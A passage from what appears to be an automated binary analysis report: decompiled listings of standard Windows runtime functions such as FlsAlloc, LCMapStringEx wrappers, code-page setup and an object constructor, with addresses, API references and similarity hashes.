    • API ID: H_prolog
    • String ID: CMT
    • API String ID: 3519838083-2756464174
    • Opcode ID: 378f3733d3dfe682b3022088d1d69d477cca6ff7442ed2cb601ff1a6ad25d8f5
    • Instruction ID: 93321ab6b81c2212014d88de09f74710bc0a0e518ec6b9847067a583d5f5deb4
    • Opcode Fuzzy Hash: 378f3733d3dfe682b3022088d1d69d477cca6ff7442ed2cb601ff1a6ad25d8f5
    • Instruction Fuzzy Hash: 1B11CD70A00205AFDF04EF68C499ABEFBBAFFC5700F44405AE841D7242DB349955CAD2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00859CBF(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4, int _a8, short* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _t18;
    				intOrPtr* _t20;
    				intOrPtr* _t31;
    				signed int _t33;
    
    				_t26 = __ecx;
    				_push(__ecx);
    				_t18 =  *0x86d668; // 0x14325215
    				_v8 = _t18 ^ _t33;
    				_push(__esi);
    				_t20 = E008599EB(0x16, "LCMapStringEx", 0x866084, "LCMapStringEx"); // executed
    				_t31 = _t20;
    				if(_t31 == 0) {
    					LCMapStringW(E00859D47(_t26, _t31, __eflags, _a4, 0), _a8, _a12, _a16, _a20, _a24);
    				} else {
    					 *0x862260(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36);
    					 *_t31();
    				}
    				return E0084E243(_v8 ^ _t33);
    			}








    0x00859cbf
    0x00859cc4
    0x00859cc5
    0x00859ccc
    0x00859ccf
    0x00859ce1
    0x00859ce6
    0x00859ced
    0x00859d30
    0x00859cef
    0x00859d0c
    0x00859d12
    0x00859d12
    0x00859d44

    APIs
    • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,47E85006,00000001,?,000000FF), ref: 00859D30
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: String
    • String ID: LCMapStringEx
    • API String ID: 2568140703-3893581201
    • Opcode ID: d84dab3d6efb8c4900ef0d1c127eb7dd8d9b50de0518814bb6eacb1a6e563ec5
    • Instruction ID: 102b32b40905d309b40513b2c8c8d6f2cfa1adcae7c650bdb07b0d9a8936b930
    • Opcode Fuzzy Hash: d84dab3d6efb8c4900ef0d1c127eb7dd8d9b50de0518814bb6eacb1a6e563ec5
    • Instruction Fuzzy Hash: C001133290020DFBCF129F95CC02DAE7FA6FB08751F054158FE18AA260D6768931EB81
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00859C5D(void* __ecx, void* __esi, void* __eflags, struct _CRITICAL_SECTION* _a4, long _a8, intOrPtr _a12) {
    				signed int _v8;
    				signed int _t8;
    				intOrPtr* _t10;
    				intOrPtr* _t20;
    				signed int _t22;
    
    				_push(__ecx);
    				_t8 =  *0x86d668; // 0x14325215
    				_v8 = _t8 ^ _t22;
    				_t10 = E008599EB(0x14, "InitializeCriticalSectionEx", 0x86607c, 0x866084); // executed
    				_t20 = _t10;
    				if(_t20 == 0) {
    					InitializeCriticalSectionAndSpinCount(_a4, _a8);
    				} else {
    					 *0x862260(_a4, _a8, _a12);
    					 *_t20();
    				}
    				return E0084E243(_v8 ^ _t22);
    			}








    0x00859c62
    0x00859c63
    0x00859c6a
    0x00859c7f
    0x00859c84
    0x00859c8b
    0x00859ca8
    0x00859c8d
    0x00859c98
    0x00859c9e
    0x00859c9e
    0x00859cbc

    APIs
    • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,008592EC), ref: 00859CA8
    Strings
    • InitializeCriticalSectionEx, xrefs: 00859C78
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CountCriticalInitializeSectionSpin
    • String ID: InitializeCriticalSectionEx
    • API String ID: 2593887523-3084827643
    • Opcode ID: 4d462854a169312685a6c037c670da52c8557759fa857eaa18a625b19ca5578e
    • Instruction ID: 3eb1fdcaf5111ac41b96f47424cc2018c429ac0fddcf83634418b7f2340ba3e6
    • Opcode Fuzzy Hash: 4d462854a169312685a6c037c670da52c8557759fa857eaa18a625b19ca5578e
    • Instruction Fuzzy Hash: 79F0B431A4521CFBCB116F55DC01CAE7FA5FB05721B024165FD159A360DAB24E20D7C1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 37%
    			E00859B02(void* __ecx, void* __esi, void* __eflags, intOrPtr _a4) {
    				signed int _v8;
    				signed int _t4;
    				intOrPtr* _t6;
    				intOrPtr* _t16;
    				signed int _t18;
    
    				_push(__ecx);
    				_t4 =  *0x86d668; // 0x14325215
    				_v8 = _t4 ^ _t18;
    				_t6 = E008599EB(3, "FlsAlloc", 0x866040, 0x866048); // executed
    				_t16 = _t6;
    				if(_t16 == 0) {
    					TlsAlloc();
    				} else {
    					 *0x862260(_a4);
    					 *_t16();
    				}
    				return E0084E243(_v8 ^ _t18);
    			}








    0x00859b07
    0x00859b08
    0x00859b0f
    0x00859b24
    0x00859b29
    0x00859b30
    0x00859b41
    0x00859b32
    0x00859b37
    0x00859b3d
    0x00859b3d
    0x00859b55

    APIs
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Alloc
    • String ID: FlsAlloc
    • API String ID: 2773662609-671089009
    • Opcode ID: e6ee1b1e2f9da9cc976bf3126fd1520e2b141da14e8899975e7ef62a512a926b
    • Instruction ID: 1b9b6eefb67dc7276e1f58bfe982fef7378decc36386aff2db5af7708e8ac824
    • Opcode Fuzzy Hash: e6ee1b1e2f9da9cc976bf3126fd1520e2b141da14e8899975e7ef62a512a926b
    • Instruction Fuzzy Hash: CFE0E531A45628E7C6206B659C02D6EBB58FF15721B020169FC0AE7380DDB45E1496C7
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 68%
    			E00852877(void* __eflags, intOrPtr _a4) {
    				intOrPtr* _t2;
    				intOrPtr* _t6;
    
    				_t2 = E00852756(4, "FlsAlloc", 0x864394, "FlsAlloc"); // executed
    				_t6 = _t2;
    				if(_t6 == 0) {
    					return TlsAlloc();
    				}
    				L0084E2DE();
    				return  *_t6(_a4);
    			}





    0x0085288c
    0x00852891
    0x00852898
    0x008528ab
    0x008528ab
    0x0085289f
    0x008528a8

    APIs
    • try_get_function.LIBVCRUNTIME ref: 0085288C
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: try_get_function
    • String ID: FlsAlloc
    • API String ID: 2742660187-671089009
    • Opcode ID: 601ad3a0d737f7fd95e55f8308b4c31d2cf97e98b524ecd423c843ca7a51b183
    • Instruction ID: 9dd853aaf9a37d0ba9fe992b5d8e2adea2ab48cca87052abe09f649eb2a949cc
    • Opcode Fuzzy Hash: 601ad3a0d737f7fd95e55f8308b4c31d2cf97e98b524ecd423c843ca7a51b183
    • Instruction Fuzzy Hash: B9D0122178572867951032D85D02D9DBA54F602BB2F0610A1FF2CE5381E999541041D6
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 97%
    			E0085A8CE(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
    				signed int _v8;
    				char _v22;
    				struct _cpinfo _v28;
    				signed int _v32;
    				signed int _v36;
    				signed int _t48;
    				int _t51;
    				signed int _t54;
    				signed int _t55;
    				short _t58;
    				signed char _t62;
    				signed int _t63;
    				signed char* _t72;
    				signed char* _t73;
    				int _t78;
    				signed int _t81;
    				signed char* _t82;
    				short* _t83;
    				int _t87;
    				signed char _t88;
    				signed int _t89;
    				signed int _t91;
    				signed int _t92;
    				int _t94;
    				int _t95;
    				intOrPtr _t98;
    				signed int _t99;
    
    				_t48 =  *0x86d668; // 0x14325215
    				_v8 = _t48 ^ _t99;
    				_t98 = _a8;
    				_t78 = E0085A4A1(__eflags, _a4);
    				if(_t78 != 0) {
    					_t94 = 0;
    					__eflags = 0;
    					_t81 = 0;
    					_t51 = 0;
    					_v32 = 0;
    					while(1) {
    						__eflags =  *((intOrPtr*)(_t51 + 0x86d828)) - _t78;
    						if( *((intOrPtr*)(_t51 + 0x86d828)) == _t78) {
    							break;
    						}
    						_t81 = _t81 + 1;
    						_t51 = _t51 + 0x30;
    						_v32 = _t81;
    						__eflags = _t51 - 0xf0;
    						if(_t51 < 0xf0) {
    							continue;
    						} else {
    							__eflags = _t78 - 0xfde8;
    							if(_t78 == 0xfde8) {
    								L23:
    							} else {
    								__eflags = _t78 - 0xfde9;
    								if(_t78 == 0xfde9) {
    									goto L23;
    								} else {
    									_t51 = IsValidCodePage(_t78 & 0x0000ffff);
    									__eflags = _t51;
    									if(_t51 == 0) {
    										goto L23;
    									} else {
    										_t51 = GetCPInfo(_t78,  &_v28);
    										__eflags = _t51;
    										if(_t51 == 0) {
    											__eflags =  *0x890854 - _t94; // 0x0
    											if(__eflags == 0) {
    												goto L23;
    											} else {
    												E0085A514(_t98);
    												goto L37;
    											}
    										} else {
    											E0084E920(_t94, _t98 + 0x18, _t94, 0x101);
    											 *(_t98 + 4) = _t78;
    											 *(_t98 + 0x21c) = _t94;
    											_t78 = 1;
    											__eflags = _v28 - 1;
    											if(_v28 <= 1) {
    												 *(_t98 + 8) = _t94;
    											} else {
    												__eflags = _v22;
    												_t72 =  &_v22;
    												if(_v22 != 0) {
    													while(1) {
    														_t88 = _t72[1];
    														__eflags = _t88;
    														if(_t88 == 0) {
    															goto L16;
    														}
    														_t91 = _t88 & 0x000000ff;
    														_t89 =  *_t72 & 0x000000ff;
    														while(1) {
    															__eflags = _t89 - _t91;
    															if(_t89 > _t91) {
    																break;
    															}
    															 *(_t98 + _t89 + 0x19) =  *(_t98 + _t89 + 0x19) | 0x00000004;
    															_t89 = _t89 + 1;
    															__eflags = _t89;
    														}
    														_t72 =  &(_t72[2]);
    														__eflags =  *_t72;
    														if( *_t72 != 0) {
    															continue;
    														}
    														goto L16;
    													}
    												}
    												L16:
    												_t73 = _t98 + 0x1a;
    												_t87 = 0xfe;
    												do {
    													 *_t73 =  *_t73 | 0x00000008;
    													_t73 =  &(_t73[1]);
    													_t87 = _t87 - 1;
    													__eflags = _t87;
    												} while (_t87 != 0);
    												 *(_t98 + 0x21c) = E0085A463( *(_t98 + 4));
    												 *(_t98 + 8) = _t78;
    											}
    											_t95 = _t98 + 0xc;
    											asm("stosd");
    											asm("stosd");
    											asm("stosd");
    											L36:
    											E0085A579(_t78, _t91, _t95, _t98, _t98); // executed
    											L37:
    											__eflags = 0;
    										}
    									}
    								}
    							}
    						}
    						goto L39;
    					}
    					E0084E920(_t94, _t98 + 0x18, _t94, 0x101);
    					_t54 = _v32 * 0x30;
    					__eflags = _t54;
    					_v36 = _t54;
    					_t55 = _t54 + 0x86d838;
    					_v32 = _t55;
    					do {
    						__eflags =  *_t55;
    						_t82 = _t55;
    						if( *_t55 != 0) {
    							while(1) {
    								_t62 = _t82[1];
    								__eflags = _t62;
    								if(_t62 == 0) {
    									break;
    								}
    								_t92 =  *_t82 & 0x000000ff;
    								_t63 = _t62 & 0x000000ff;
    								while(1) {
    									__eflags = _t92 - _t63;
    									if(_t92 > _t63) {
    										break;
    									}
    									__eflags = _t92 - 0x100;
    									if(_t92 < 0x100) {
    										_t31 = _t94 + 0x86d820; // 0x8040201
    										 *(_t98 + _t92 + 0x19) =  *(_t98 + _t92 + 0x19) |  *_t31;
    										_t92 = _t92 + 1;
    										__eflags = _t92;
    										_t63 = _t82[1] & 0x000000ff;
    										continue;
    									}
    									break;
    								}
    								_t82 =  &(_t82[2]);
    								__eflags =  *_t82;
    								if( *_t82 != 0) {
    									continue;
    								}
    								break;
    							}
    							_t55 = _v32;
    						}
    						_t94 = _t94 + 1;
    						_t55 = _t55 + 8;
    						_v32 = _t55;
    						__eflags = _t94 - 4;
    					} while (_t94 < 4);
    					 *(_t98 + 4) = _t78;
    					 *(_t98 + 8) = 1;
    					 *(_t98 + 0x21c) = E0085A463(_t78);
    					_t83 = _t98 + 0xc;
    					_t91 = _v36 + 0x86d82c;
    					_t95 = 6;
    					do {
    						_t58 =  *_t91;
    						_t91 = _t91 + 2;
    						 *_t83 = _t58;
    						_t83 = _t83 + 2;
    						_t95 = _t95 - 1;
    						__eflags = _t95;
    					} while (_t95 != 0);
    					goto L36;
    				} else {
    					E0085A514(_t98);
    				}
    				L39:
    				return E0084E243(_v8 ^ _t99);
    			}






























    0x0085a8d6
    0x0085a8dd
    0x0085a8e5
    0x0085a8ed
    0x0085a8f2
    0x0085a903
    0x0085a903
    0x0085a905
    0x0085a907
    0x0085a909
    0x0085a90c
    0x0085a90c
    0x0085a912
    0x00000000
    0x00000000
    0x0085a918
    0x0085a919
    0x0085a91c
    0x0085a91f
    0x0085a924
    0x00000000
    0x0085a926
    0x0085a926
    0x0085a92c
    0x0085a9fa
    0x0085a932
    0x0085a932
    0x0085a938
    0x00000000
    0x0085a93e
    0x0085a942
    0x0085a948
    0x0085a94a
    0x00000000
    0x0085a950
    0x0085a955
    0x0085a95b
    0x0085a95d
    0x0085a9e7
    0x0085a9ed
    0x00000000
    0x0085a9ef
    0x0085a9f0
    0x00000000
    0x0085a9f0
    0x0085a963
    0x0085a96d
    0x0085a972
    0x0085a97a
    0x0085a980
    0x0085a981
    0x0085a984
    0x0085a9d7
    0x0085a986
    0x0085a986
    0x0085a98a
    0x0085a98d
    0x0085a98f
    0x0085a98f
    0x0085a992
    0x0085a994
    0x00000000
    0x00000000
    0x0085a996
    0x0085a999
    0x0085a9a4
    0x0085a9a4
    0x0085a9a6
    0x00000000
    0x00000000
    0x0085a99e
    0x0085a9a3
    0x0085a9a3
    0x0085a9a3
    0x0085a9a8
    0x0085a9ab
    0x0085a9ae
    0x00000000
    0x00000000
    0x00000000
    0x0085a9ae
    0x0085a98f
    0x0085a9b0
    0x0085a9b0
    0x0085a9b3
    0x0085a9b8
    0x0085a9b8
    0x0085a9bb
    0x0085a9bc
    0x0085a9bc
    0x0085a9bc
    0x0085a9cc
    0x0085a9d2
    0x0085a9d2
    0x0085a9dc
    0x0085a9df
    0x0085a9e0
    0x0085a9e1
    0x0085aaa5
    0x0085aaa6
    0x0085aaab
    0x0085aaac
    0x0085aaac
    0x0085a95d
    0x0085a94a
    0x0085a938
    0x0085a92c
    0x00000000
    0x0085aaae
    0x0085aa0c
    0x0085aa14
    0x0085aa14
    0x0085aa18
    0x0085aa1b
    0x0085aa21
    0x0085aa24
    0x0085aa24
    0x0085aa27
    0x0085aa29
    0x0085aa2b
    0x0085aa2b
    0x0085aa2e
    0x0085aa30
    0x00000000
    0x00000000
    0x0085aa32
    0x0085aa35
    0x0085aa51
    0x0085aa51
    0x0085aa53
    0x00000000
    0x00000000
    0x0085aa3a
    0x0085aa40
    0x0085aa42
    0x0085aa48
    0x0085aa4c
    0x0085aa4c
    0x0085aa4d
    0x00000000
    0x0085aa4d
    0x00000000
    0x0085aa40
    0x0085aa55
    0x0085aa58
    0x0085aa5b
    0x00000000
    0x00000000
    0x00000000
    0x0085aa5b
    0x0085aa5d
    0x0085aa5d
    0x0085aa60
    0x0085aa61
    0x0085aa64
    0x0085aa67
    0x0085aa67
    0x0085aa6d
    0x0085aa70
    0x0085aa7f
    0x0085aa88
    0x0085aa8d
    0x0085aa93
    0x0085aa94
    0x0085aa94
    0x0085aa97
    0x0085aa9a
    0x0085aa9d
    0x0085aaa0
    0x0085aaa0
    0x0085aaa0
    0x00000000
    0x0085a8f4
    0x0085a8f5
    0x0085a8fb
    0x0085aaaf
    0x0085aabe

    APIs
      • Part of subcall function 0085A4A1: GetOEMCP.KERNEL32(00000000,?,?,0085A72A,?), ref: 0085A4CC
    • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0085A76F,?,00000000), ref: 0085A942
    • GetCPInfo.KERNEL32(00000000,0085A76F,?,?,?,0085A76F,?,00000000), ref: 0085A955
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: CodeInfoPageValid
    • String ID:
    • API String ID: 546120528-0
    • Opcode ID: c30fcee6b3907dbce1935cd48efd9645d38c786fd1f5897f8adce3801f8b92da
    • Instruction ID: 5370ff6f8b48acb1c6d643a7e862c1756a148e4ecef4e1259acb15a6c751a86e
    • Opcode Fuzzy Hash: c30fcee6b3907dbce1935cd48efd9645d38c786fd1f5897f8adce3801f8b92da
    • Instruction Fuzzy Hash: F3515570A003299ECB29CF75C4C16BABFE5FF40302F14426ED896C7241E6359949CB93
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E00831373(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
    				void* __esi;
    				void* _t56;
    				signed int _t62;
    				signed int _t63;
    				char _t64;
    				intOrPtr _t74;
    				void* _t87;
    				intOrPtr _t89;
    				void* _t91;
    				void* _t96;
    
    				_t96 = __eflags;
    				_t87 = __edi;
    				E0084D8C4(_t56, __ecx);
    				_push(__ecx);
    				_t89 = __ecx;
    				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
    				E008394D4(__ecx);
    				 *((intOrPtr*)(__ecx)) = 0x8622e8;
    				 *((intOrPtr*)(_t91 - 4)) = 0;
    				E00835FC6(__ecx + 0x1024, __edx, _t96);
    				 *((char*)(_t91 - 4)) = 1;
    				E0083C567(__ecx + 0x20e8, __edx, _t96);
    				 *((intOrPtr*)(__ecx + 0x21d0)) = 0;
    				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
    				E0083150C();
    				_t62 = E0083150C();
    				 *((char*)(_t91 - 4)) = 4;
    				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
    				 *((intOrPtr*)(__ecx + 0x21bc)) = 0;
    				 *(__ecx + 0x21b8) = _t63;
    				_t98 = _t63;
    				if(_t63 == 0) {
    					_t64 =  *((intOrPtr*)(_t91 + 8));
    				} else {
    					_t74 = E0084D880(__edx, __ecx, _t98, 0x82e8);
    					 *((intOrPtr*)(_t91 + 8)) = _t74;
    					 *((char*)(_t91 - 4)) = 5;
    					if(_t74 == 0) {
    						_t64 = 0;
    					} else {
    						_t64 = E0083ADBF(_t74); // executed
    					}
    				}
    				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
    				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
    				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
    				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
    				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
    				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
    				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
    				 *((char*)(_t89 + 0x6cbc)) = 0;
    				 *((short*)(_t89 + 0x6cc4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
    				E0084E920(_t87, _t89 + 0x2208, 0, 0x40);
    				E0084E920(_t87, _t89 + 0x2248, 0, 0x34);
    				E0084E920(_t87, _t89 + 0x4590, 0, 0x20);
    				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
    				 *((short*)(_t89 + 0x6cfa)) = 0;
    				 *((char*)(_t89 + 0x6cd6)) = 0;
    				 *((char*)(_t89 + 0x6cf8)) = 0;
    				 *((char*)(_t89 + 0x21e0)) = 0;
    				 *[fs:0x0] =  *((intOrPtr*)(_t91 - 0xc));
    				return _t89;
    			}













    0x00831373
    0x00831373
    0x00831373
    0x00831378
    0x0083137b
    0x0083137d
    0x00831380
    0x00831387
    0x00831393
    0x00831396
    0x008313a1
    0x008313a5
    0x008313b0
    0x008313b6
    0x008313bc
    0x008313c7
    0x008313cf
    0x008313d3
    0x008313d6
    0x008313dc
    0x008313e2
    0x008313e4
    0x00831409
    0x008313e6
    0x008313eb
    0x008313f1
    0x008313f4
    0x008313fa
    0x00831405
    0x008313fc
    0x008313fe
    0x008313fe
    0x008313fa
    0x0083140c
    0x00831418
    0x0083141f
    0x00831426
    0x0083142f
    0x0083143a
    0x00831444
    0x0083144a
    0x00831450
    0x00831456
    0x0083145c
    0x00831462
    0x00831468
    0x0083146f
    0x00831475
    0x0083147b
    0x00831481
    0x00831487
    0x0083148d
    0x0083149c
    0x008314ab
    0x008314b6
    0x008314be
    0x008314c4
    0x008314ca
    0x008314d0
    0x008314d6
    0x008314dc
    0x008314e2
    0x008314eb
    0x008314f1
    0x008314f7
    0x008314ff
    0x00831509

    APIs
    • __EH_prolog.LIBCMT ref: 00831373
      • Part of subcall function 00835FC6: __EH_prolog.LIBCMT ref: 00835FCB
      • Part of subcall function 0083C567: __EH_prolog.LIBCMT ref: 0083C56C
      • Part of subcall function 0083C567: new.LIBCMT ref: 0083C5AF
      • Part of subcall function 0083C567: new.LIBCMT ref: 0083C5D3
    • new.LIBCMT ref: 008313EB
      • Part of subcall function 0083ADBF: __EH_prolog.LIBCMT ref: 0083ADC4
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: H_prolog
    • String ID:
    • API String ID: 3519838083-0
    • Opcode ID: afde1b15c08e87c4ef8b5eb3bddd01784597c4701f67a9f5fedd48beeec8f84d
    • Instruction ID: 5cb068a033ea16fbb02b12abb0f47f640fd14b755b5bd6b67f04a1e7cace0240
    • Opcode Fuzzy Hash: afde1b15c08e87c4ef8b5eb3bddd01784597c4701f67a9f5fedd48beeec8f84d
    • Instruction Fuzzy Hash: B34121B0805B449AD724CF798489AE6FBE5FB18700F404A6EE5EEC3282CB326554CB56
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 98%
    			E0083136E(intOrPtr __ecx, void* __edx, void* __edi, void* __eflags) {
    				void* __esi;
    				signed int _t62;
    				signed int _t63;
    				char _t64;
    				intOrPtr _t74;
    				void* _t87;
    				intOrPtr _t89;
    				void* _t91;
    				void* _t96;
    
    				_t96 = __eflags;
    				_t87 = __edi;
    				E0084D8C4(E008611A7, __ecx);
    				_push(__ecx);
    				_t89 = __ecx;
    				 *((intOrPtr*)(_t91 - 0x10)) = __ecx;
    				E008394D4(__ecx);
    				 *((intOrPtr*)(__ecx)) = 0x8622e8;
    				 *((intOrPtr*)(_t91 - 4)) = 0;
    				E00835FC6(__ecx + 0x1024, __edx, _t96);
    				 *((char*)(_t91 - 4)) = 1;
    				E0083C567(__ecx + 0x20e8, __edx, _t96);
    				 *((intOrPtr*)(__ecx + 0x21d0)) = 0;
    				 *((intOrPtr*)(__ecx + 0x21d4)) = 0;
    				E0083150C();
    				_t62 = E0083150C();
    				 *((char*)(_t91 - 4)) = 4;
    				_t63 = _t62 & 0xffffff00 |  *((intOrPtr*)(_t91 + 8)) == 0x00000000;
    				 *((intOrPtr*)(__ecx + 0x21bc)) = 0;
    				 *(__ecx + 0x21b8) = _t63;
    				_t98 = _t63;
    				if(_t63 == 0) {
    					_t64 =  *((intOrPtr*)(_t91 + 8));
    				} else {
    					_t74 = E0084D880(__edx, __ecx, _t98, 0x82e8);
    					 *((intOrPtr*)(_t91 + 8)) = _t74;
    					 *((char*)(_t91 - 4)) = 5;
    					if(_t74 == 0) {
    						_t64 = 0;
    					} else {
    						_t64 = E0083ADBF(_t74); // executed
    					}
    				}
    				 *((intOrPtr*)(_t89 + 0x21bc)) = _t64;
    				 *(_t89 + 0x21c0) =  *(_t89 + 0x21c0) | 0xffffffff;
    				 *(_t89 + 0x21c4) =  *(_t89 + 0x21c4) | 0xffffffff;
    				 *(_t89 + 0x21c8) =  *(_t89 + 0x21c8) | 0xffffffff;
    				 *((char*)(_t89 + 0x1d)) =  *((intOrPtr*)(_t64 + 0x6199));
    				 *((intOrPtr*)(_t89 + 0x6cb0)) = 2;
    				 *((intOrPtr*)(_t89 + 0x6cb4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cb8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cc0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d4)) = 0;
    				 *((char*)(_t89 + 0x6cbc)) = 0;
    				 *((short*)(_t89 + 0x6cc4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x21d8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ca8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cac)) = 0;
    				E0084E920(_t87, _t89 + 0x2208, 0, 0x40);
    				E0084E920(_t87, _t89 + 0x2248, 0, 0x34);
    				E0084E920(_t87, _t89 + 0x4590, 0, 0x20);
    				 *((intOrPtr*)(_t89 + 0x6cd8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce4)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6ce8)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cec)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cf0)) = 0;
    				 *((intOrPtr*)(_t89 + 0x6cf4)) = 0;
    				 *((short*)(_t89 + 0x6cfa)) = 0;
    				 *((char*)(_t89 + 0x6cd6)) = 0;
    				 *((char*)(_t89 + 0x6cf8)) = 0;
    				 *((char*)(_t89 + 0x21e0)) = 0;
